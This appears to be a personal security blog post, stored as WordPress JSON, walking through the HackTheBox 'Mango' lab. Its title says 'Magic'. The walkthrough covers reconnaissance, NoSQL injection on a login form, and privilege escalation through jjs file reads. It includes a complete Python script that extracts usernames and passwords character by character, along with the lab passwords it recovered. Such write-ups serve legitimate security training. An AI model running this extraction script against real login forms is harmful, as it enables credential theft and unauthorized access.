{"id":20,"date":"2020-04-27T11:47:45","date_gmt":"2020-04-27T11:47:45","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=20"},"modified":"2020-05-09T11:06:12","modified_gmt":"2020-05-09T11:06:12","slug":"hackthebox-magic-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","title":{"rendered":"HackTheBox : Magic Walkthrough"},"content":{"rendered":"\n<p>Hello everyone!!<\/p>\n\n\n\n<p>This is Shreya Pohekar. AndToday, we are doing Mango from hackthebox. Its an easy Linux box that mainly focuses on <strong>NoSQL injection<\/strong> to get the initial foothold and privilege escalation via a java command-line tool <strong>(jjs<\/strong>) to interpret javascript.<\/p>\n\n\n\n<p>So lets get started.<\/p>\n\n\n\n<p>A simple nmap scan resulted in few open ports such as ssh, http and https<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -o mangoscan.nmap 10.10.10.162<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Y-fUv8SqPoYElyAenhBWXIHTsyjJsMtDZeiGI1-_8_9bgGF3KL2YjD_3MVcyrWy3k-tVuuGMgKgKOHxJRqa0kuRJVp9XLg58Y1PYOyeNpS9WH09x6q9blnScGZOgksQZ2yWpdBEM\" alt=\"\"\/><\/figure>\n\n\n\n<p>The CN was obtained under the nmap results&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/DKnaxS3I8r862NDRF4TvWYNBRYTzCbIGgDgXRKqsPKZuaLH6k8II9QDljJVcKN4t4k59KNwEx66ZuVOKd7pcZdB1D9vs_h0bARWMSJqBmkJBwHf4iaur3XfXaMOFqmw_eGAByhMu\" alt=\"\"\/><\/figure>\n\n\n\n<p>We have to do this entry in \/etc\/hosts<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<pre class=\"wp-block-preformatted wpf-blue-background\"># vim \/etc\/hosts<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>10.10.10.162 staging-order.mango.htb<\/li><\/ul>\n<\/div><\/div>\n\n\n\n<p>Access to <a href=\"http:\/\/10.10.10.162\">http:\/\/10.10.10.162<\/a> was forbidden so I tried <a href=\"https:\/\/10.10.10.162\">https:\/\/10.10.10.162<\/a> and a page loaded that looked similar to the google search engine page.<\/p>\n\n\n\n<p>I ran a gobuster scan with -k switch to skip the ssl certificates verification for https websites.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster -u https:\/\/10.10.10.162 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 50 -k<\/pre>\n\n\n\n<p>Alongside, I went to <a href=\"https:\/\/staging-order.mango.htb\">https:\/\/staging-order.mango.htb<\/a> and got a <strong>login page<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/rKCqt0K1Wj8FX9HfADNR1j_lsanteE16Zl8Bz9iSAhioTnDOn-HG4D-nNWg6kXNBUwouLOmCa47x4z0MUjLIDu1-QYRFMe-f1vQvPSP34jZn1-t82_Mx7EWpiT-kTu2Aom6ykOZG\" alt=\"\"\/><\/figure>\n\n\n\n<p>I tried up different username-password combination but nothing worked out. The page was generating 200&nbsp; OK response for every request made. So i intercepted the request through burp and after a bit of digging, I found out that there was nosql injection vulnerability on the form.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/O5HFwW17ZFQ97akAjmfEFajd8y2-Lig8GW_sZ4p6Lj9cOOxgTFW5-49XTNGbpBmIzqG49dgoM_UGINe4sra1Lk2AzbSlTRdfGnCickqTfILRjjWij8N4aeHh3y_IUptV0Qq22pLj\" alt=\"\"\/><\/figure>\n\n\n\n<p>(credits : <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection<\/a>)<\/p>\n\n\n\n<p>Using the above payload, the response obtained in the burp was 302 found<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Ftq3h1jl7vpLl_8Et0WyOYkcObDQUm2LzViulkzOLdCGA0r94hjOo89BrlMU25l7PLQ47uwU33D-MVWmXaZZtGEeOu_v_6xRNliz9lsHe2rVUHvOT8PR2PlePPaPOnSDhl99xYSg\" alt=\"\"\/><\/figure>\n\n\n\n<p>I realized that by using the<strong> regex parameter<\/strong>, the username and the passwords can be retrieved, detecting one character per request.<\/p>\n\n\n\n<p style=\"color:#1f1e1e\" class=\"has-text-color has-drop-cap\">I grabbed a script from <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">hacktricks<\/a> performing the same steps.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport string\n\nurl = \"http:\/\/staging-order.mango.htb\"\nheaders = {\"Host\": \"staging-order.mango.htb\"}\ncookies = {\"PHPSESSID\": \"8m928e8vlmg8de7bl7vr9fpndk\"}\npossible_chars = list(string.ascii_letters) + list(string.digits) + &#91;\"\\\\\"+c for c in string.punctuation+string.whitespace ]\ndef get_password(username):\n\tprint(\"Extracting password of \"+username)\n\tparams = {\"username\":username, \"password&#91;$regex]\":\"\", \"login\": \"login\"}\n\tpassword = \"^\"\n\twhile True:\n    \tfor c in possible_chars:\n        \tparams&#91;\"password&#91;$regex]\"] = password + c + \".*\"\n        \tpr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n        \tif int(pr.status_code) == 302:\n            \tpassword += c\n            \tbreak\n    \tif c == possible_chars&#91;-1]:\n        \tprint(\"Found password \"+password&#91;1:].replace(\"\\\\\", \"\")+\" for username \"+username)\n        \treturn password&#91;1:].replace(\"\\\\\", \"\")\n\ndef get_usernames():\n\tusernames = &#91;]\n\tparams = {\"username&#91;$regex]\":\"\", \"password&#91;$regex]\":\".*\", \"login\": \"login\"}\n\tfor c in possible_chars:\n    \tusername = \"^\" + c\n    \tparams&#91;\"username&#91;$regex]\"] = username + \".*\"\n    \tpr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n    \tif int(pr.status_code) == 302:\n        \tprint(\"Found username starting with \"+c)\n        \twhile True:\n            \tfor c2 in possible_chars:\n                \tparams&#91;\"username&#91;$regex]\"] = username + c2 + \".*\"\n                \tif int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:\n                    \tusername += c2\n                    \tprint(username)\n                    \tbreak\n\n            \tif c2 == possible_chars&#91;-1]:\n                \tprint(\"Found username: \"+username&#91;1:])\n                \tusernames.append(username&#91;1:])\n                \tbreak\n\treturn usernames\n\n\nfor u in get_usernames():\n\tget_password(u)\n<\/code><\/pre>\n\n\n\n<p>The script enumerated users as admin and mango and their passwords to be<strong> t9KcS3>!0B#2 and h3mXK8RhU~f{]f5H<\/strong> respectively.\u00a0<\/p>\n\n\n\n<p>I did ssh with the creds of mango<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># ssh mango@10.10.10.162&nbsp;<\/pre>\n\n\n\n<p>Then did a switch user to admin and got a sh shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/oy9GbWvRPxUS8XpEvjg2LJamS6XDv3nHGtzlvZZPfDml3zTl8YwddMaW-FqSsq_PVc0uRB2ntS8mbEE-BZ3ezPbUmDVqFHco8XaUPkUOs_3m-mMy0vLCQPUy-DhbdycleMn3c5So\" alt=\"\"\/><\/figure>\n\n\n\n<p>Got the user.txt .<\/p>\n\n\n\n<p>Command ls -la listed a file .jjs.history that seemed to be an interesting file. So I found out its location<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/sxIsj_A_2UidhQXbBXsknQ5kA4g5MGJA3if-WhKi3L5DZc4ibieWlVS4NNwx39d4RiU-Rt5GJjVH8ooPAnXPODykMql7O_OHeHnGremj3QgCf56I6GSa7PuMSUXN3sSDi-L7G4Le\" alt=\"\"\/><\/figure>\n\n\n\n<p>To my interest, the binary was running as root and can lead to privilege escalation.<\/p>\n\n\n\n<p>Upon googling a bit, I found out that priv esc was possible with jjs<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/ryDWOyINU8H6B9fAvb8_QZxn14nNc7iPqUvkhG9jWZ3t1sMTbrK7gJVhmD4FhU6UnGHhdHL4vpMH7b1EKBumos7pLlp8BT4NFY_04mcEffr99p20hhhH_arpS7UtyXn_kSfLpdUW\" alt=\"\"\/><\/figure>\n\n\n\n<p>I used the<strong> file read<\/strong> functionality, that can read any file with privileged rights. In the code, I directly inserted the path to root.txt and upon successful execution got the root flag.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/sGub4IJ114EVjXo2pWg8nBP_b1D5ucwy0C6R75o4ULPz3JzjpO5IEUHWoRBrmcM8_sztDjGFdFppkeKFc_lwsUlfWTRkl73DWB-fU8qKIV3rqXohaKMIulHL8mLE7PH-zVHz0qcE\" alt=\"\"\/><\/figure>\n\n\n\n<p>&nbsp;That\u2019s all for this blog post. Hope you enjoyed reading and learned something out of it.<\/p>\n\n\n\n<p>For more such content subscribe to my page! <br>\nUntil then, Happy Hunting!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An easy machine from HacktheBox. Let&#8217;s grab the root flag&#8230;..<\/p>\n","protected":false},"author":1,"featured_media":21,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[26,29,31,27,28,30],"class_list":["post-20","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-hackthebox","tag-jjs-exploit","tag-jjs-gtfobins","tag-mango-hackthebox","tag-mango-walkthrough","tag-nosql-injection","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/20"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=20"}],"version-history":[{"count":5,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/20\/revisions"}],"predecessor-version":[{"id":114,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/20\/revisions\/114"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/21"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=20"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=20"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}